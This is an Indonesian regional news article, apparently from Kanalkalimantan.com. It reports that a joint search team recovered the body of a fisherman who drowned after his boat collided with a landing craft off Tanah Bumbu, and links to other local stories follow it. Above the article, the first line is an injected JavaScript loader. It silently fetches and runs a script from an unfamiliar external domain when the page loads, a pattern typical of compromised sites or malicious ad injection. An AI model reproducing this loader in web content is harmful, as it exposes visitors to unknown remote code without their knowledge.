(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Tim Gabungan Berhasil Evakuasi Jenazah Nelayan yang Tenggelam di Sungai Dua Laut


KANALKALIMANTAN.COM, BATULICIN– Warga Tanah Bumbu digegerkan atas temuan mayat seorang pria yang diduga mengalami kecelakaan (Laka) air, Rabu (23/2/2022).

Korban berinisial NS (45), seorang nelayan warga Desa Sungai Dua Laut RT 02 RW 01, Kecamatan Sungai Loban, telah ditemukan oleh tim petugas gabungan dalam kondisi tidak bernyawa.

Setelah petugas gabungan yang terdiri dari tim Basarnas Tanbu, BPBD Tanah Bumbu, Ditpolairud Polda Kalsel, Pol Airud Mabes Polri dan Satpol Airud Tanbu berserta relawan, telah berhasil menemukan korban sekitar pukul 16.30 Wita.

Bermula dari terjadinya tragedi kapal nelayan yang tenggelam kemudian korban dinyatakan hilang di perairan Sungai Dua Laut Kecamatan Sungai Loban Kabupaten Tanah Bumbu. Dari hasil pencarian akhirnya jenazah korban bisa ditemukan petugas gabungan.

 

Petugas gabungan evakuasi jenazah nelayan yang tenggelam. Foto: ftr

Baca juga : Pusling Palnam Sambangi MIS Nurul Fata di Pinggiran Sungai Martapura

Kapolres Tanah Bumbu AKBP Tri Hambodo melalui Kasi Humas AKP H I Made Rasa, membenarkan kejadian tersebut.

H I Made Rasa menyampaikan, pihaknya bergerak bersama tim gabungan langsung menuju ke lokasi setelah mendapatkan informasi tersebut, kemudian bersama tim gabungan melakukan tindakan pencarian korban. Dibantu keahlian para tim yang bekerja sama melakukan pencarian, akhirnya korban berhasil ditemukan meski dalam kondisi tidak bernyawa lagi.

“Selanjutnya, dilakukan visum oleh ahli medis (dokter) Puskesmas Sebamban Satu. Jenazah Korban NS tersebut ditemukan sekitar pukul 16.30 Wita, di Perairan Sungai Dua Laut. Jenazah kemudian, diserahkan ke pihak keluarga untuk dilakukan pemakaman,” paparnya.

Di samping itu, kronologi penyebab terjadinya Laka Air atas kapal yang ditumpangi oleh NS dan rekannya masih belum diketahui secara pasti atau masih dalam lidik pihak kepolisian.

 

Baca juga : Bahas Dokumen RPD 2023-2026, Plt Bupati HSU: Prioritas Mengatasi Kemiskinan

Informasi sebelumnya sempat diwartakan, kapal nelayan mengalami tabrakan dengan Kapal LCT di perairan laut Sungai Loban Kabupaten Tanah Bumbu, pada Selasa (22/2/2022) sekitar pukul 04.30 Wita.

“Akibat Laka Air tersebut, kapal yang ditumpangi oleh 6 orang nelayan mengalami tenggelam di perairan laut Sungai Loban, 5 korban dalam kondisi selamat dan satu korban yaitu NS dinyatakan meninggal dunia,” katanya. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : cell


Desy Arfianty

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

10 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

10 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

11 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

11 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

11 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

11 jam ago

This website uses cookies.